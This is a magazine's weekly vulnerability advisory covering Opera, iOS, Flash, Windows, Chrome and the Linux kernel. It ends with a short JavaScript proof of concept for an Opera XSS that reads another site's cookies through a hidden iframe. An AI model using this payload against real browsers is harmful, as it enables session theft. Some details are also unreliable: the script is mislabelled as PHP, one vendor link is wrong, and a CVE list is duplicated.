Отчет по уязвимостям с 8 по 15 октября
www.samag.ru
     
Поиск   
              
 www.samag.ru    Web  0 товаров , сумма 0 руб.
E-mail
Пароль  
 Запомнить меня
Регистрация | Забыли пароль?
Журнал "Системный администратор"
Журнал «БИТ»
Наука и технологии
Подписка
Где купить
Авторам
Рекламодателям
Архив номеров
Контакты
   

  Опросы
  Статьи

Электронный документооборот  

5 способов повысить безопасность электронной подписи

Область применения технологий электронной подписи с каждым годом расширяется. Все больше задач

 Читать далее...

Рынок труда  

Системные администраторы по-прежнему востребованы и незаменимы

Системные администраторы, практически, есть везде. Порой их не видно и не слышно,

 Читать далее...

Учебные центры  

Карьерные мечты нужно воплощать! А мы поможем

Школа Bell Integrator открывает свои двери для всех, кто хочет освоить перспективную

 Читать далее...

Гость номера  

Дмитрий Галов: «Нельзя сказать, что люди становятся доверчивее, скорее эволюционирует ландшафт киберугроз»

Использование мобильных устройств растет. А вместе с ними быстро растет количество мобильных

 Читать далее...

Прошу слова  

Твердая рука в бархатной перчатке: принципы soft skills

Лауреат Нобелевской премии, специалист по рынку труда, профессор Лондонской школы экономики Кристофер

 Читать далее...

1001 и 1 книга  
19.03.2018г.
Просмотров: 9898
Комментарии: 0
Потоковая обработка данных

 Читать далее...

19.03.2018г.
Просмотров: 8109
Комментарии: 0
Релевантный поиск с использованием Elasticsearch и Solr

 Читать далее...

19.03.2018г.
Просмотров: 8212
Комментарии: 0
Конкурентное программирование на SCALA

 Читать далее...

19.03.2018г.
Просмотров: 5197
Комментарии: 0
Машинное обучение с использованием библиотеки Н2О

 Читать далее...

12.03.2018г.
Просмотров: 5880
Комментарии: 0
Особенности киберпреступлений в России: инструменты нападения и защита информации

 Читать далее...

Друзья сайта  

 Отчет по уязвимостям с 8 по 15 октября

Статьи / Отчет по уязвимостям с 8 по 15 октября

Автор: Андрей Бирюков

Еженедельный отчет содержит описания шести уязвимостей, в том числе и множественных в наиболее распространенных приложениях и операционных системах.

Отчет по уязвимостям с 8 по 15 октября

Еженедельный отчет содержит описания шести уязвимостей, в том числе и множественных в наиболее распространенных приложениях и операционных системах.

 

Opera  

В известном браузере Opera обнаружена уязвимость, которая позволяет удаленному пользователю произвести XSS нападение. Из-за недостаточной обработки data:URL, удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности произвольного сайта.

Пример эксплуатации уязвимости в конце статьи.

Ссылка на сайт разработчика:  https://rdot.org/forum/showthread.php?t=2444

  

Версии:  Opera 12.02 для Windows, Mac OS и Linux, возможно более ранние версии

Опасность: критическая

Операционные системы: 

ID в базе CVE:

Решение: Решения на настоящий момент не существует.

 

 Apple IOS

Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на целевой системе. Всего обнаружены 32 уязвимости. Подробное описание уязвимостей можно найти в статье http://www.securitylab.ru/vulnerability/430961.php.    

Ссылка на сайт разработчика: 

http://support.apple.com/kb/HT5503

 Версии: Apple iOS 5.x для iPhone 3GS и более поздних версий
Apple iOS для iPad 5.x
Apple iOS для iPod touch 5.x.

 

Опасность: высокая

Операционные системы: 

ID в базе CVE: CVE-2011-1167
CVE-2011-1944
CVE-2011-2821
CVE-2011-2834
CVE-2011-2845
CVE-2011-3016
CVE-2011-3021
CVE-2011-3026
CVE-2011-3027
CVE-2011-3032
CVE-2011-3034
CVE-2011-3035
CVE-2011-3036
CVE-2011-3037
CVE-2011-3038
CVE-2011-3039
CVE-2011-3040
CVE-2011-3041
CVE-2011-3042
CVE-2011-3043
CVE-2011-3044
CVE-2011-3048
CVE-2011-3050
CVE-2011-3053
CVE-2011-3059
CVE-2011-3060
CVE-2011-3064
CVE-2011-3067
CVE-2011-3068
CVE-2011-3069
CVE-2011-3071
CVE-2011-3073
CVE-2011-3074
CVE-2011-3075
CVE-2011-3076
CVE-2011-3078
CVE-2011-3081
CVE-2011-3086
CVE-2011-3089
CVE-2011-3090
CVE-2011-3105
CVE-2011-3328
CVE-2011-3457
CVE-2011-3913
CVE-2011-3919
CVE-2011-3924
CVE-2011-3926
CVE-2011-3958
CVE-2011-3966
CVE-2011-3968
CVE-2011-3969
CVE-2011-3971
CVE-2011-4599
CVE-2012-0680
CVE-2012-0682
CVE-2012-0683
CVE-2012-1126
CVE-2012-1127
CVE-2012-1128
CVE-2012-1129
CVE-2012-1130
CVE-2012-1131
CVE-2012-1132
CVE-2012-1133
CVE-2012-1134
CVE-2012-1135
CVE-2012-1136
CVE-2012-1137
CVE-2012-1138
CVE-2012-1139
CVE-2012-1140
CVE-2012-1141
CVE-2012-1142
CVE-2012-1143
CVE-2012-1144
CVE-2012-1173
CVE-2012-1520
CVE-2012-1521
CVE-2012-2815
CVE-2012-2818
CVE-2012-3589
CVE-2012-3591
CVE-2012-3592
CVE-2012-3593
CVE-2012-3594
CVE-2012-3595
CVE-2012-3596
CVE-2012-3597
CVE-2012-3598
CVE-2012-3599
CVE-2012-3590
CVE-2012-3600
CVE-2012-3601
CVE-2012-3602
CVE-2012-3603
CVE-2012-3604
CVE-2012-3605
CVE-2012-3606
CVE-2012-3607
CVE-2012-3608
CVE-2012-3609
CVE-2012-3610
CVE-2012-3611
CVE-2012-3612
CVE-2012-3613
CVE-2012-3614
CVE-2012-3615
CVE-2012-3616
CVE-2012-3617
CVE-2012-3618
CVE-2012-3620
CVE-2012-3624
CVE-2012-3625
CVE-2012-3626
CVE-2012-3627
CVE-2012-3628
CVE-2012-3629
CVE-2012-3630
CVE-2012-3631
CVE-2012-3632
CVE-2012-3633
CVE-2012-3634
CVE-2012-3635
CVE-2012-3636
CVE-2012-3637
CVE-2012-3638
CVE-2012-3639
CVE-2012-3640
CVE-2012-3641
CVE-2012-3642
CVE-2012-3644
CVE-2012-3645
CVE-2012-3646
CVE-2012-3647
CVE-2012-3648
CVE-2012-3650
CVE-2012-3651
CVE-2012-3652
CVE-2012-3653
CVE-2012-3654
CVE-2012-3655
CVE-2012-3656
CVE-2012-3658
CVE-2012-3659
CVE-2012-3660
CVE-2012-3661
CVE-2012-3663
CVE-2012-3664
CVE-2012-3665
CVE-2012-3666
CVE-2012-3667
CVE-2012-3668
CVE-2012-3669
CVE-2012-3670
CVE-2012-3671
CVE-2012-3672
CVE-2012-3673
CVE-2012-3674
CVE-2012-3676
CVE-2012-3677
CVE-2012-3678
CVE-2012-3679
CVE-2012-3680
CVE-2012-3681
CVE-2012-3682
CVE-2012-3683
CVE-2012-3684
CVE-2012-3686
CVE-2012-3691
CVE-2012-3693
CVE-2012-3695
CVE-2012-3696
CVE-2012-3703
CVE-2012-3704
CVE-2012-3706
CVE-2012-3708
CVE-2012-3710
CVE-2012-3722
CVE-2012-3724
CVE-2012-3725
CVE-2012-3726
CVE-2012-3727
CVE-2012-3728
CVE-2012-3729
CVE-2012-3730
CVE-2012-3731
CVE-2012-3732
CVE-2012-3733
CVE-2012-3734
CVE-2012-3735
CVE-2012-3736
CVE-2012-3737
CVE-2012-3738
CVE-2012-3739
CVE-2012-3740
CVE-2012-3741
CVE-2012-3742
CVE-2012-3743
CVE-2012-3744
CVE-2012-3745
CVE-2012-3746
CVE-2012-3747

 

 

 

Решение: Для устранения уязвимостей установите обновление с сайта производителя

Adobe Flash Player

Обнаруженные уязвимости позволяют удаленному пользователю скомпрометировать целевую систему. Обнаружены множественные уязвимости в Adobe Flash Player и Adobe AIR, которые позволяют удаленному пользователю вызвать переполнение буфера или повреждение памяти и выполнить произвольный код на целевой системе. Подробности уязвимостей не сообщаются.

Ссылка на сайт разработчика:  

http://www.adobe.com/support/security/bulletins/apsb12-22.html    

Версии: Adobe Flash Player 11.4.402.278 для Windows, и более ранние версии
Adobe Flash Player 11.4.402.265 для Macintosh, и более ранние версии
Adobe Flash Player 11.2.202.238 для Linux, и более ранние версии
Adobe Flash Player 11.1.115.17 для Android 4.x, и более ранние версии
Adobe Flash Player 11.1.111.16 для Android 3.x и 2.x, и более ранние версии
Adobe AIR 3.4.0.2540 для Windows and Macintosh, и более ранние версии
Adobe AIR 3.4.0.2540 SDK, и более ранние версии
Adobe AIR 3.4.0.2540 для Android, и более ранние версии   

Опасность: критическая

Операционные системы: 

ID в базе CVE:  

CVE-2012-5248
CVE-2012-5249
CVE-2012-5250
CVE-2012-5251
CVE-2012-5253
CVE-2012-5254
CVE-2012-5255
CVE-2012-5257
CVE-2012-5259
CVE-2012-5260
CVE-2012-5262
CVE-2012-5264
CVE-2012-5265
CVE-2012-5266
CVE-2012-5252
CVE-2012-5256
CVE-2012-5258
CVE-2012-5261
CVE-2012-5263
CVE-2012-5267
CVE-2012-5268
CVE-2012-5269
CVE-2012-5270
CVE-2012-5271
CVE-2012-5272

Решение: Установить обновления с сайта производителя.

 

Microsoft Windows

В операционной системе Windows из-за того, что служба IKE and AuthIP IPsec Keying Modules пытается подключить несуществующую на системе библиотеку wlbsctrl.dll, локальный пользователь может поместить вредоносный файл с одноименным названием в поисковый путь по умолчанию и повысить свои привилегии на системе. Для успешной эксплуатации уязвимости на системе должен быть установлен ActivePerl в конфигурации по умолчанию или любое другое приложение, которое устанавливается в корневую директорию диска C и дописывает путь к установочной директории в системную переменную окружения PATH.

 

Ссылки на сайт разработчика: 

https://www.vmware.com/support/pubs/vcops-advanced-pubs.html  

 

Версии: Microsoft Windows Vista
Microsoft Windows 2008
Microsoft Windows 7

 

Опасность: критическая

Операционные системы: Microsoft Windows Vista
Microsoft Windows 2008
Microsoft Windows 7

 

ID в базе CVE: 

CVE-2012-5377
CVE-2012-5378
CVE-2012-5379
CVE-2012-5380
CVE-2012-5381
CVE-2012-5382
CVE-2012-5383

 

Решение: В настоящее время исправления не существует.  

 

Google Chrome

По еженедельной традиции в браузере Google Chrome обнаружены множественные уязвимости, которые позволяют удаленному пользователю выполнить произвольный код на целевой системе.

 

1. Обнаружены множественные уязвимости в Adobe Flash Player, входящем в состав Google Chrome. Удаленный пользователь может скомпрометировать целевую систему. Подробное описание уязвимостей: http://www.securitylab.ru/vulnerability/431016.php

 

2. Уязвимость существует из-за ошибки, относящейся к рендерингу Skia-текста. Удаленный пользователь может выполнить произвольный код на целевой системе.

 

3. Уязвимость существует из-за ошибки состояния операции при обработке аудио устройств. Удаленный пользователь может выполнить произвольный код на целевой системе.

 

4. Уязвимость существует из-за ошибки, относящейся к обработке регулярных выражений ICU. Удаленный пользователь может спровоцировать чтение данных за пределами буфера и выполнить произвольный код на целевой системе.

 

5. Уязвимость существует из-за ошибки при обработке compositor. Удаленный пользователь может спровоцировать чтение данных за пределами буфера и выполнить произвольный код на целевой системе.

 

6. Уязвимость существует из-за ошибки, относящейся к механизму наблюдения за отказами в обслуживании Pepper плагинов. Удаленный пользователь может выполнить произвольный код на целевой системе.

Ссылки на сайт разработчика:    

http://googlechromereleases.blogspot.dk/2012/10/stable-channel-update.html

Версии:  

 

Опасность: высокая

Операционные системы: 

 

ID в базе CVE: CVE-2012-5248
CVE-2012-5249
CVE-2012-5250
CVE-2012-5251
CVE-2012-5253
CVE-2012-5254
CVE-2012-5255
CVE-2012-5257
CVE-2012-5259
CVE-2012-5260
CVE-2012-5262
CVE-2012-5264
CVE-2012-5265
CVE-2012-5266
CVE-2012-5252
CVE-2012-5256
CVE-2012-5258
CVE-2012-5261
CVE-2012-5263
CVE-2012-5267
CVE-2012-5268
CVE-2012-5269
CVE-2012-5270
CVE-2012-5271
CVE-2012-5272
CVE-2012-2900
CVE-2012-5108
CVE-2012-5109
CVE-2012-5110
CVE-2012-5111

Решение: Установить соответствующее обновление с сайта производителя  

 

Linux Kernel

Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует из-за ошибки проверки границ данных в функции "hfs_bnode_read()" в файле fs/hfs/bnode.c. Локальный пользователь может вызвать переполнение буфера и повысить свои привилегии.

Ссылки на сайт разработчика:    

http://www.kernel.org/pub/linux/kernel/v2.6/longterm/v2.6.32/ChangeLog-2.6.32.60

Версии: Linux Kernel версии до 2.6.32.60

 

Опасность: высокая

Операционные системы: 

 

ID в базе CVE:

Решение: Установить соответствующее обновление с сайта производителя  

 

 

Эксплоит для уязвимость в браузере Opera

 

PHP код для чтения cookie:

 

<script>

if(document.domain == 'tinyurl.com')

    location.reload();

 

function xss()

{

    alert(document.frames[0].document.cookie);

}

 

function ifrAdd()

{

    var ifr = document.createElement('iframe');

    ifr.style = 'width:0px;height:0px;visibility:hidden';

    ifr.src = 'http';

    ifr.src += document.referrer.length ? '' : 's';

    ifr.src += '://forum.antichat.ru/css/a.css';

    ifr.onload = function(){xss()};

    document.body.appendChild(ifr);

}

 

</script>

<body onload=ifrAdd()> 

 

Использованные источники:

  1. Securitytracker.com
  2. Securitylab.ru

 

 

 

 

 

Комментарии отсутствуют

               Copyright © Системный администратор

Яндекс.Метрика
Tel.: (499) 277-12-41
Fax: (499) 277-12-45
E-mail: sa@samag.ru